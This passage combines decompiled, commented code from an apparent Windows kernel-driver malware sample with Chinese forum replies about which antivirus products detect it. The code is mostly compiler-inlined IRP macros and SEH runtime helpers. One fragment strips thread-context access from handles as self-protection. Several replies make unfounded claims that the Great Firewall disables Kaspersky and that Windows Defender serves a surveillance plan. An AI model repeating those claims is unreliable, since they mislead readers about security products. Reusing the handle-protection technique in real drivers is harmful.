    if ( *(_DWORD *)(*(_DWORD *)(a2 + 20) + 4) & 0x10 )
      **(_DWORD **)(a2 + 20) &= 0xFFFFFFEF;  // drop THREAD_SET_CONTEXT
  }
  return 0;
}
// 4024F0: using guessed type int __stdcall ThreadCallback(int, int);
// 403090: using guessed type int __stdcall PsGetProcessId(_DWORD);

//----- (00402600) --------------------------------------------------------
/*
 * Compiler-inlined IoGetCurrentIrpStackLocation() with its NT_ASSERT kept —
 * not custom driver logic, despite the analyst-assigned name.
 * 32-bit IRP offsets: +34 StackCount, +35 CurrentLocation,
 * +96 Tail.Overlay.CurrentStackLocation.  __int2c() is the x86 assertion trap
 * (int 2Ch) that NT_ASSERT expands to; it fires when
 * CurrentLocation > StackCount + 1, i.e. the IRP has been over-completed.
 * Returns: the current PIO_STACK_LOCATION, typed as int by the decompiler.
 */
int __stdcall IogetcurrentIrpstacklocation(int a1)
{
  if ( *(char *)(a1 + 35) > *(char *)(a1 + 34) + 1 )  // NT_ASSERT(CurrentLocation <= StackCount + 1)
    __int2c();
  return *(_DWORD *)(a1 + 96);  // Tail.Overlay.CurrentStackLocation
}

//----- (00402640) --------------------------------------------------------
/*
 * Compiler-inlined IoGetNextIrpStackLocation(): asserts CurrentLocation (+35)
 * is positive, then returns the current stack location (+96) minus one
 * IO_STACK_LOCATION, which is 36 bytes on 32-bit.  Again library code, not
 * driver-specific behaviour.
 * Returns: the next PIO_STACK_LOCATION, typed as int by the decompiler.
 */
int __stdcall sub_402640(int a1)
{
  if ( *(char *)(a1 + 35) <= 0 )  // NT_ASSERT(CurrentLocation > 0)
    __int2c();
  return *(_DWORD *)(a1 + 96) - 36;  // CurrentStackLocation - sizeof(IO_STACK_LOCATION)
}

//----- (00402670) --------------------------------------------------------
/*
 * Compiler-inlined IoSetCompletionRoutine():
 *   a1 Irp, a2 CompletionRoutine, a3 Context,
 *   a4 InvokeOnSuccess, a5 InvokeOnError, a6 InvokeOnCancel.
 * It writes into the NEXT stack location (via sub_402640, defined just above):
 *   +28 CompletionRoutine, +32 Context, +3 Control byte with
 *   SL_INVOKE_ON_SUCCESS (0x40), SL_INVOKE_ON_ERROR (0x80),
 *   SL_INVOKE_ON_CANCEL (0x20).
 * The leading NT_ASSERT requires a non-NULL routine whenever any Invoke flag
 * is set.  The macro has no return value; "result" is a register artefact of
 * decompilation and carries no meaning for callers.
 */
int __stdcall sub_402670(int a1, int a2, int a3, char a4, unsigned __int8 a5, char a6)
{
  int result; // eax  (decompiler artefact, see header comment)
  BOOL v7; // [esp+4h] [ebp-Ch]  assertion operand
  int v8; // [esp+Ch] [ebp-4h]  next IO_STACK_LOCATION

  // NT_ASSERT((InvokeOnSuccess || InvokeOnError || InvokeOnCancel) ? CompletionRoutine != NULL : TRUE)
  if ( a4 || a5 || a6 )
    v7 = a2 != 0;
  else
    v7 = 1;
  if ( !v7 )
    __int2c();
  v8 = sub_402640(a1);  // IoGetNextIrpStackLocation
  *(_DWORD *)(v8 + 28) = a2;  // CompletionRoutine
  *(_DWORD *)(v8 + 32) = a3;  // Context
  *(_BYTE *)(v8 + 3) = 0;  // Control
  if ( a4 )
    *(_BYTE *)(v8 + 3) = 64;  // SL_INVOKE_ON_SUCCESS
  result = a5;
  if ( a5 )
  {
    result = v8;
    *(_BYTE *)(v8 + 3) |= 0x80u;  // SL_INVOKE_ON_ERROR
  }
  if ( a6 )
  {
    result = *(unsigned __int8 *)(v8 + 3) | 0x20;  // SL_INVOKE_ON_CANCEL
    *(_BYTE *)(v8 + 3) = result;
  }
  return result;
}

//----- (00402998) --------------------------------------------------------
/*
 * Looks like the MSVC SEH4 runtime handler (__unwind_handler4 from the CRT's
 * exsup4 support) that the compiler links into the image — C runtime, not
 * malware logic; analysts can skip it.  Signature matches an exception
 * handler: a1 EXCEPTION_RECORD, a2 registration frame, a3 CONTEXT (unused),
 * a4 dispatcher context.
 *   a1+4 is ExceptionFlags; 6 == EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND.
 *   When unwinding it calls sub_402908 (presumably _local_unwind4) with three
 *   fields of the frame, stores the frame in *a4 and returns 3
 *   (ExceptionCollidedUnwind); otherwise returns 1 (ExceptionContinueSearch).
 * v5 (frame ^ frame+8, the security-cookie check) and v6 are dead in this
 * decompilation.  Identification is by pattern — TODO confirm against the CRT
 * source if it matters.
 */
signed int __cdecl sub_402998(int a1, unsigned int a2, int a3, unsigned int *a4)
{
  signed int result; // eax
  int v5; // ecx  dead: security-cookie XOR
  int v6; // ebp  dead

  result = 1;  // ExceptionContinueSearch
  if ( *(_DWORD *)(a1 + 4) & 6 )  // EXCEPTION_UNWINDING | EXCEPTION_EXIT_UNWIND
  {
    v5 = a2 ^ *(_DWORD *)(a2 + 8);
    v6 = *(_DWORD *)(a2 + 24);
    sub_402908(*(_DWORD *)(a2 + 20), *(_DWORD *)(a2 + 16), *(_DWORD *)(a2 + 12));  // local unwind of the frame
    *a4 = a2;  // DispatcherContext <- this frame
    result = 3;  // ExceptionCollidedUnwind
  }
  return result;
}
// 402908: using guessed type _DWORD __cdecl sub_402908(_DWORD, _DWORD, _DWORD);

//----- (004029FC) --------------------------------------------------------
/*
 * CRT SEH4 helper: invokes the function pointer passed in ecx (the decompiler
 * shows it as "this") — consistent with _EH4_CallFilterFunc calling an
 * __except filter.  Runtime support code, not driver logic.
 * Returns: whatever the called function returns.
 */
int __thiscall sub_4029FC(int (__fastcall *this)(_DWORD, _DWORD))
{
  return this(this, 0);
}

//----- (00402A14) --------------------------------------------------------
/*
 * CRT SEH4 helper: emits a non-local-goto notification for debuggers
 * (_NLG_Notify(1)) and then transfers to the handler address held in ecx —
 * consistent with _EH4_TransferToHandler.  Runtime support code.
 * Returns: the handler's return value (in practice control does not come back
 * through here in normal SEH flow; the decompiler renders the jump as a call).
 */
int __thiscall sub_402A14(int (__fastcall *this)(_DWORD, _DWORD))
{
  int (__fastcall *v1)(_DWORD, _DWORD); // esi  handler address

  v1 = this;
  _NLG_Notify(1);  // tell an attached debugger about the non-local transfer
  return v1(0, 0);
}
// 402A6D: using guessed type _DWORD __stdcall _NLG_Notify(_DWORD);

//----- (00402A30) --------------------------------------------------------
/*
 * CRT SEH4 helper: global unwind to TargetFrame via RtlUnwind, with loc_402A45
 * (the instruction after the call) as the return address — consistent with
 * _EH4_GlobalUnwind2.  Runtime support code, not driver logic.
 */
void __thiscall sub_402A30(PVOID TargetFrame)
{
  RtlUnwind(TargetFrame, &loc_402A45, 0, 0);
}

//----- (00402A4C) --------------------------------------------------------
/*
 * CRT SEH4 helper: forwards to sub_402908 (presumably _local_unwind4) with
 * its arguments re-ordered (a4, a1, a2) — consistent with the longjmp-unwind
 * thunk of the SEH4 runtime.  Runtime support code.
 * Returns: sub_402908's result.
 */
int __fastcall sub_402A4C(int a1, int a2, int a3, int a4)
{
  return sub_402908(a4, a1, a2);
}
// 402908: using guessed type _DWORD __cdecl sub_402908(_DWORD, _DWORD, _DWORD);

// ALL OK, 33 function(s) have been successfully decompiled


色彩之狐
发表于 2018-3-22 14:55:27 | 显示全部楼层
驭龙 发表于 2018-3-21 13:17
我的WD云CL杀终于正常了

不是WD云CL终于正常了 而是网络长城防火墙休假我一个朋友就在长城工作可懂 WD只是执行星球聆听计划的检查任务 不管用户的有没有中毒可懂  还不图那些所谓评测机构虚名 要的实干啊
色彩之狐
发表于 2018-3-22 14:58:13 | 显示全部楼层
橡果公爵 发表于 2018-3-22 08:51
可能微软爱改名的风气蔓延到了反病毒部门。

WD就是那样内部架设就是星云流水病毒库 还有CL全称CCLL名字
色彩之狐
发表于 2018-3-22 14:59:46 | 显示全部楼层
太古汇聚 发表于 2018-3-22 11:41
卡巴miss,下载后 KIS18没有动静,单击后电脑直接蓝屏重启。。。。。。。kIS手动扫描仅提示not-virus...

俄罗斯的卡巴斯基之所以流畅那是因为长城防火墙断了他的检查能力所以流畅了 可不是程序优化才有卡巴斯基流畅的
pal家族
发表于 2018-3-22 15:33:49 | 显示全部楼层
色彩之狐 发表于 2018-3-22 14:59
俄罗斯的卡巴斯基之所以流畅那是因为长城防火墙断了他的检查能力所以流畅了 可不是程序优化才有卡巴斯基 ...

恭迎火绒论坛K-毅大神驾临卡饭!
小弟迎驾来迟,诚惶诚恐!!望恕罪!
色彩之狐
发表于 2018-3-22 16:02:55 | 显示全部楼层
提示: 该帖被管理员或版主屏蔽
2605276004x
发表于 2018-3-22 17:35:48 | 显示全部楼层
违禁词lm反手就是一个举报
色彩之狐
发表于 2018-3-22 17:43:47 | 显示全部楼层
你这叫靠近系统内核的驱动级病毒挖矿发电都行
Autonomous
发表于 2018-3-22 19:22:06 | 显示全部楼层
macOS表示无法运行,奈我何
Kaspersky用户
发表于 2018-3-22 19:22:17 | 显示全部楼层
COMODO扫描MISS,双击后VS杀掉。
